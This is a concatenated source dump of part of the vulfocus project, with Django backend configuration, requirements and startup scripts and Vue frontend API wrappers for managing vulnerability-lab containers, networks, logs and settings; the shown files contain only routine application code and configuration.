14 | is_newest = models.BooleanField(verbose_name="是否最新发布", default=False)
15 | is_public = models.BooleanField(verbose_name="是否已经发布", default=False)
16 |
17 | class Meta:
18 | db_table = "notice_info"
19 |
--------------------------------------------------------------------------------
/vulfocus-api/notice/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/requirements.txt:
--------------------------------------------------------------------------------
1 | Django==2.2.24
2 | django-cors-headers==3.1.0
3 | django-filter==2.2.0
4 | djangorestframework==3.11.2
5 | djangorestframework-jwt==1.11.0
6 | Markdown==3.1.1
7 | PyJWT==1.7.1
8 | pytz==2019.2
9 | sqlparse==0.3.0
10 | IPy==1.0
11 | docker==3.7.3
12 | docker-compose==1.25.4
13 | docker-pycreds==0.4.0
14 | dockerpty==0.4.1
15 | celery==4.4.2
16 | redis==3.2.0
17 | Pillow==8.2.0
18 | dnspython==2.1.0
19 | ruamel.yaml==0.17.10
20 | django-simple-captcha==0.5.14
21 | django-notifications-hq==1.6.0
22 | zipfile36==0.1.3
23 | PyMySQL==1.0.2
24 |
--------------------------------------------------------------------------------
/vulfocus-api/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | service nginx start
4 | wait
5 | service redis-server restart
6 | wait
7 | nohup python3 manage.py runserver 0.0.0.0:8000 &
8 | celery -B -A vulfocus worker -l info -E --logfile=celery.log
9 |
10 |
--------------------------------------------------------------------------------
/vulfocus-api/sources.list:
--------------------------------------------------------------------------------
1 | deb https://mirrors.ustc.edu.cn/debian/ stretch main contrib non-free
2 | deb-src https://mirrors.ustc.edu.cn/debian/ stretch main contrib non-free
3 |
4 | deb https://mirrors.ustc.edu.cn/debian/ stretch-updates main contrib non-free
5 | deb-src https://mirrors.ustc.edu.cn/debian/ stretch-updates main contrib non-free
6 |
7 | deb https://mirrors.ustc.edu.cn/debian/ stretch-backports main contrib non-free
8 | deb-src https://mirrors.ustc.edu.cn/debian/ stretch-backports main contrib non-free
9 |
10 | deb https://mirrors.ustc.edu.cn/debian-security/ stretch/updates main contrib non-free
11 | deb-src https://mirrors.ustc.edu.cn/debian-security/ stretch/updates main contrib non-free
--------------------------------------------------------------------------------
/vulfocus-api/static/user/bmh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/static/user/bmh.png
--------------------------------------------------------------------------------
/vulfocus-api/tasks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/tasks/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/tasks/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/tasks/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class TasksConfig(AppConfig):
5 | name = 'tasks'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/tasks/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/tasks/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/tasks/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/user/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/user/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/user/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/user/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class UserConfig(AppConfig):
5 | name = 'user'
6 |
--------------------------------------------------------------------------------
/vulfocus-api/user/jwt.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 |
3 |
4 | def jwt_response_payload_handler(token, user=None, request=None):
5 | return {
6 | "code": 20000,
7 | "data": {
8 | "token": token
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/vulfocus-api/user/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-api/user/migrations/__init__.py
--------------------------------------------------------------------------------
/vulfocus-api/user/permissions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # author: xuzhiyi
4 | # datetime: 2021/7/16 10:17
5 | # ide: PyCharm
6 |
7 |
8 | #自定义用户权限
9 |
10 | from rest_framework import permissions
11 |
12 | class IsOwner(permissions.BasePermission):
13 | def has_object_permission(self, request, view, obj):
14 | return request.user.username==obj.username
15 |
--------------------------------------------------------------------------------
/vulfocus-api/user/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/vulfocus-api/uwsgi.ini:
--------------------------------------------------------------------------------
1 | [uwsgi]
2 | # 使用nginx连接时使用,Django程序所在服务器地址
3 | # 选择内网IP和端口
4 | http=127.0.0.1:8000
5 | # 项目根目录
6 | chdir=/usr/local/vulfocus
7 | #项目中wsgi.py文件的相对目录
8 | wsgi-file=vulfocus/wsgi.py
9 | buffer-size = 65536
10 | # 进程数
11 | processes=2
12 | # 线程数
13 | threads=2
14 | # uwsgi服务器的角色
15 | master=True
16 | # 存放进程编号的文件
17 | pidfile=uwsgi.pid
18 |
--------------------------------------------------------------------------------
/vulfocus-api/vulfocus/__init__.py:
--------------------------------------------------------------------------------
1 | from .celery import app as celery_app
2 | import pymysql
3 |
4 |
5 | __all__ = ('celery_app',)
6 | pymysql.install_as_MySQLdb()
7 |
--------------------------------------------------------------------------------
/vulfocus-api/vulfocus/wsgi.py:
--------------------------------------------------------------------------------
1 | """
2 | WSGI config for vulfocus project.
3 |
4 | It exposes the WSGI callable as a module-level variable named ``application``.
5 |
6 | For more information on this file, see
7 | https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
8 | """
9 |
10 | import os
11 |
12 | from django.core.wsgi import get_wsgi_application
13 |
14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vulfocus.settings')
15 |
16 | application = get_wsgi_application()
17 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.editorconfig:
--------------------------------------------------------------------------------
1 | # http://editorconfig.org
2 | root = true
3 |
4 | [*]
5 | charset = utf-8
6 | indent_style = space
7 | indent_size = 2
8 | end_of_line = lf
9 | insert_final_newline = true
10 | trim_trailing_whitespace = true
11 |
12 | [*.md]
13 | insert_final_newline = false
14 | trim_trailing_whitespace = false
15 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.env.development:
--------------------------------------------------------------------------------
1 | # just a flag
2 | ENV = 'development'
3 |
4 | # base api
5 | #VUE_APP_BASE_API = '/dev-api'
6 | VUE_APP_BASE_API = 'http://127.0.0.1:8000'
7 | #VUE_APP_BASE_API = 'http://10.10.10.172:8000'
8 | # vue-cli uses the VUE_CLI_BABEL_TRANSPILE_MODULES environment variable,
9 | # to control whether the babel-plugin-dynamic-import-node plugin is enabled.
10 | # It only does one thing by converting all import() to require().
11 | # This configuration can significantly increase the speed of hot updates,
12 | # when you have a large number of pages.
13 | # Detail: https://github.com/vuejs/vue-cli/blob/dev/packages/@vue/babel-preset-app/index.js
14 |
15 | VUE_CLI_BABEL_TRANSPILE_MODULES = true
16 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.env.production:
--------------------------------------------------------------------------------
1 | # just a flag
2 | ENV = 'production'
3 |
4 | # base api
5 | VUE_APP_BASE_API = '/api'
6 |
7 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.env.staging:
--------------------------------------------------------------------------------
1 | NODE_ENV = production
2 |
3 | # just a flag
4 | ENV = 'staging'
5 |
6 | # base api
7 | VUE_APP_BASE_API = '/stage-api'
8 |
9 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.eslintignore:
--------------------------------------------------------------------------------
1 | build/*.js
2 | src/assets
3 | public
4 | dist
5 | src
6 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | node_modules/
3 | dist/
4 | npm-debug.log*
5 | yarn-debug.log*
6 | yarn-error.log*
7 | package-lock.json
8 | tests/**/coverage/
9 |
10 | # Editor directories and files
11 | .idea
12 | .vscode
13 | *.suo
14 | *.ntvs*
15 | *.njsproj
16 | *.sln
17 |
--------------------------------------------------------------------------------
/vulfocus-frontend/.travis.yml:
--------------------------------------------------------------------------------
1 | language: node_js
2 | node_js: 10
3 | script: npm run test
4 | notifications:
5 | email: false
6 |
--------------------------------------------------------------------------------
/vulfocus-frontend/README.md:
--------------------------------------------------------------------------------
1 | # vulfocus WEB
2 |
3 | vulfocus 前端项目,通过 Element-ui + VUE 构建。
4 |
5 | 环境:
6 | - UI:Element UI
7 | - 框架:vue
8 | - node:v12.16.2
9 | - npm:6.14.4
10 |
11 | ## 部署
12 |
13 | 安装依赖:
14 | ```shell script
15 | npm install
16 | ```
17 |
18 | 构建项目:
19 | ```
20 | npm run build:prod
21 | ```
22 |
23 | 将 dist 目录部署至 nginx 中,默认 nginx 静态目录位于 `/var/www/html`。
24 |
25 | ## 开发
26 |
27 | ```shell script
28 | npm run dev
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/vulfocus-frontend/babel.config.js:
--------------------------------------------------------------------------------
1 | module.exports = {
2 | presets: [
3 | '@vue/app'
4 | ]
5 | }
6 |
--------------------------------------------------------------------------------
/vulfocus-frontend/jest.config.js:
--------------------------------------------------------------------------------
1 | module.exports = {
2 | moduleFileExtensions: ['js', 'jsx', 'json', 'vue'],
3 | transform: {
4 | '^.+\\.vue$': 'vue-jest',
5 | '.+\\.(css|styl|less|sass|scss|svg|png|jpg|ttf|woff|woff2)$':
6 | 'jest-transform-stub',
7 | '^.+\\.jsx?$': 'babel-jest'
8 | },
9 | moduleNameMapper: {
10 | '^@/(.*)$': '/src/$1'
11 | },
12 | snapshotSerializers: ['jest-serializer-vue'],
13 | testMatch: [
14 | '**/tests/unit/**/*.spec.(js|jsx|ts|tsx)|**/__tests__/*.(js|jsx|ts|tsx)'
15 | ],
16 | collectCoverageFrom: ['src/utils/**/*.{js,vue}', '!src/utils/auth.js', '!src/utils/request.js', 'src/components/**/*.{js,vue}'],
17 | coverageDirectory: '/tests/unit/coverage',
18 | // 'collectCoverage': true,
19 | 'coverageReporters': [
20 | 'lcov',
21 | 'text-summary'
22 | ],
23 | testURL: 'http://localhost/'
24 | }
25 |
--------------------------------------------------------------------------------
/vulfocus-frontend/postcss.config.js:
--------------------------------------------------------------------------------
1 | // https://github.com/michael-ciniawsky/postcss-load-config
2 |
3 | module.exports = {
4 | 'plugins': {
5 | // to edit target browsers: use "browserslist" field in package.json
6 | 'autoprefixer': {}
7 | }
8 | }
9 |
--------------------------------------------------------------------------------
/vulfocus-frontend/public/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/public/favicon.ico
--------------------------------------------------------------------------------
/vulfocus-frontend/public/favicon_back.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/public/favicon_back.ico
--------------------------------------------------------------------------------
/vulfocus-frontend/public/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | <%= webpackConfig.name %>
9 |
10 |
11 |
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/vulfocus-frontend/public/index.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/public/index.png
--------------------------------------------------------------------------------
/vulfocus-frontend/public/login_icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/public/login_icon.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/App.vue:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
30 |
31 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/container.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | export function containerList(flag,page,imageId) {
4 | if(page === undefined || page === null){
5 | page = 1
6 | }
7 | if(imageId === undefined || imageId == null){
8 | imageId = ""
9 | }
10 | return request({
11 | url: '/container/?flag='+flag+"&page="+page+"&image_id="+imageId,
12 | method: 'get'
13 | })
14 | }
15 |
16 | export function containerStop(id) {
17 | return request({
18 | url: '/container/'+id+'/stop/?flag=list',
19 | method: 'get'
20 | })
21 | }
22 |
23 | export function containerStart(id) {
24 | return request({
25 | url: '/container/'+id+'/start/?flag=list',
26 | method: 'get'
27 | })
28 | }
29 |
30 | export function containerDel(id) {
31 | return request({
32 | url: '/container/'+id+'/delete/?flag=list',
33 | method: 'delete'
34 | })
35 | }
36 |
37 |
38 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/log.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | export function LogList(data, page) {
4 | if (data === undefined){
5 | data = ""
6 | }
7 | if (page === undefined){
8 | page = 1
9 | }
10 | return request({
11 | url: '/syslog/?query='+data+"&page="+page,
12 | method: 'get'
13 | })
14 | }
15 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/network.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | export function NetWorkList(data, page) {
4 | if (data === undefined){
5 | data = ""
6 | }
7 | if (page === undefined){
8 | page = 1
9 | }
10 | return request({
11 | url: '/network/?query='+data+"&page="+page,
12 | method: 'get'
13 | })
14 | }
15 |
16 | export function NetWorkAdd(data) {
17 | return request({
18 | url: "/network/",
19 | method: "post",
20 | data
21 | })
22 | }
23 |
24 | export function NetworkDelete(id) {
25 | return request({
26 | url: '/network/'+id+'/',
27 | method: 'DELETE',
28 | })
29 | }
30 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/setting.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | export function settingGet() {
4 | return request({
5 | url: '/setting/get',
6 | method: 'get'
7 | })
8 | }
9 |
10 | export function settingUpdate(data) {
11 | return request({
12 | url: '/setting/update/',
13 | method: 'post',
14 | data
15 | })
16 | }
17 |
18 | export function settingimg() {
19 | return request({
20 | url: 'get/settingimg',
21 | method: 'get'
22 | })
23 | }
24 |
25 | export function enterpriseUpdate(data) {
26 | return request({
27 | url: '/enterprise/update/',
28 | method: 'post',
29 | data
30 | })
31 | }
32 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/table.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | export function getList(params) {
4 | return request({
5 | url: '/table/list',
6 | method: 'get',
7 | params
8 | })
9 | }
10 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/tasks.js:
--------------------------------------------------------------------------------
1 | import request from '@/utils/request'
2 |
3 | /**
4 | * 根据任务ID获取任务信息
5 | * @param taskId 任务ID
6 | */
7 | export function getTask(taskId) {
8 | return request({
9 | url: '/tasks/'+taskId+'/get/',
10 | method: 'get'
11 | })
12 | }
13 |
14 | /**
15 | * 批量获取任务信息
16 | * @param data 任务id列表
17 | */
18 | export function batchTask(data) {
19 | return request({
20 | url: '/tasks/batch/batch/',
21 | method: 'post',
22 | data
23 | })
24 | }
25 |
26 | /**
27 | * 获取任务状态进度
28 | * @param taskId 任务ID
29 | */
30 | export function progressTask(taskId) {
31 | return request({
32 | url: '/tasks/'+taskId+'/progress/',
33 | method: 'get'
34 | })
35 | }
36 |
37 | export function layoutbathchTask(data) {
38 | return request({
39 | url: '/tasks/layout_batch/layout_batch/',
40 | method: 'post',
41 | data
42 | })
43 | }
44 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/api/utils.js:
--------------------------------------------------------------------------------
1 | import axios from 'axios'
2 |
3 |
4 | export function search(keyword) {
5 | let url = "https://hub.docker.com/api/content/v1/products/search?page_size=50&q=vulfocus%2F"+keyword+"&type=image"
6 | return axios({
7 | method: 'get',
8 | url: url,
9 | headers:{
10 | "Sec-Fetch-Site": "none",
11 | "Sec-Fetch-Mode": "cors",
12 | "Sec-Fetch-Dest": "empty",
13 | "Accept-Encoding": "gzip, deflate",
14 | "Accept-Language": "zh-CN,zh;q=0.9",
15 | "Search-Version": "v3",
16 | }
17 | })
18 | }
19 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/404_images/404.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/404_images/404.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/404_images/404_cloud.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/404_images/404_cloud.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/Customs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/Customs.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/bmh.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/bmh.jpg
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/bmh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/bmh.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/loginbackground.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/loginbackground.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/loginbg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/loginbg.jpg
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/loginbg02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/loginbg02.jpg
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/loginbg02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/loginbg02.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/loginl.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/loginl.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/logintitle.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/logintitle.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/modelbg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/modelbg.jpg
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/application.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/application.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/canvas_bg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/canvas_bg.jpg
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/cloud.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/cloud.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/compute.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/compute.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/container.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/container.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/database.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/database.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/dbms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/dbms.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/filesystem.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/filesystem.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/icons.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/icons.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/message.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/message.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/network.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/network.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/port.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/root.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/router.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/router.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/sercurity.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/sercurity.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/storage.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/subnet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/subnet.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/virtualip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/virtualip.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/volume.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/volume.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/assets/topo/webserver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/assets/topo/webserver.png
--------------------------------------------------------------------------------
/vulfocus-frontend/src/config/connectorRules.js:
--------------------------------------------------------------------------------
1 | let connectorRules = [
2 | {
3 | type:'Container',
4 | canBeContainedType:[],
5 | canLinkToType: ['Network']
6 | },
7 | {
8 | type:'Network',
9 | canBeContainedType:[],
10 | canLinkToType:['Container']
11 | }
12 | ]
13 | export default connectorRules
14 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/config/toolbarNodeData.js:
--------------------------------------------------------------------------------
1 | const toolbarNodeData = [
2 | // {type:'Service',icon:require('@/assets/topo/root.png'),width:140,height:80,num:1,classType:'T1'},
3 | {type:'Container',icon:require('@/assets/topo/container.png'),width:200,height:120,num:1,classType:'T1'},
4 | {type:'Network',icon:require('@/assets/topo/network.png'),width:200,height:100,num:1,classType:'T1'},
5 | ]
6 | export default toolbarNodeData
7 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/index.js:
--------------------------------------------------------------------------------
1 | import Vue from 'vue'
2 | import SvgIcon from '@/components/SvgIcon'// svg component
3 |
4 | // register globally
5 | Vue.component('svg-icon', SvgIcon)
6 |
7 | const req = require.context('./svg', false, /\.svg$/)
8 | const requireAll = requireContext => requireContext.keys().map(requireContext)
9 | requireAll(req)
10 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/barrage_fill.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/docker.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/example.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/eye.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/link.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/log.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/nested.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/password.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/stop.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/table.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svg/user.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/icons/svgo.yml:
--------------------------------------------------------------------------------
1 | # replace default config
2 |
3 | # multipass: true
4 | # full: true
5 |
6 | plugins:
7 |
8 | # - name
9 | #
10 | # or:
11 | # - name: false
12 | # - name: true
13 | #
14 | # or:
15 | # - name:
16 | # param1: 1
17 | # param2: 2
18 |
19 | - removeAttrs:
20 | attrs:
21 | - 'fill'
22 | - 'fill-rule'
23 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/layout/components/Sidebar/FixiOSBug.js:
--------------------------------------------------------------------------------
1 | export default {
2 | computed: {
3 | device() {
4 | return this.$store.state.app.device
5 | }
6 | },
7 | mounted() {
8 | // In order to fix the click on menu on the ios device will trigger the mouseleave bug
9 | // https://github.com/PanJiaChen/vue-element-admin/issues/1135
10 | this.fixBugIniOS()
11 | },
12 | methods: {
13 | fixBugIniOS() {
14 | const $subMenu = this.$refs.subMenu
15 | if ($subMenu) {
16 | const handleMouseleave = $subMenu.handleMouseleave
17 | $subMenu.handleMouseleave = (e) => {
18 | if (this.device === 'mobile') {
19 | return
20 | }
21 | handleMouseleave(e)
22 | }
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/layout/components/Sidebar/Item.vue:
--------------------------------------------------------------------------------
1 |
30 |
--------------------------------------------------------------------------------
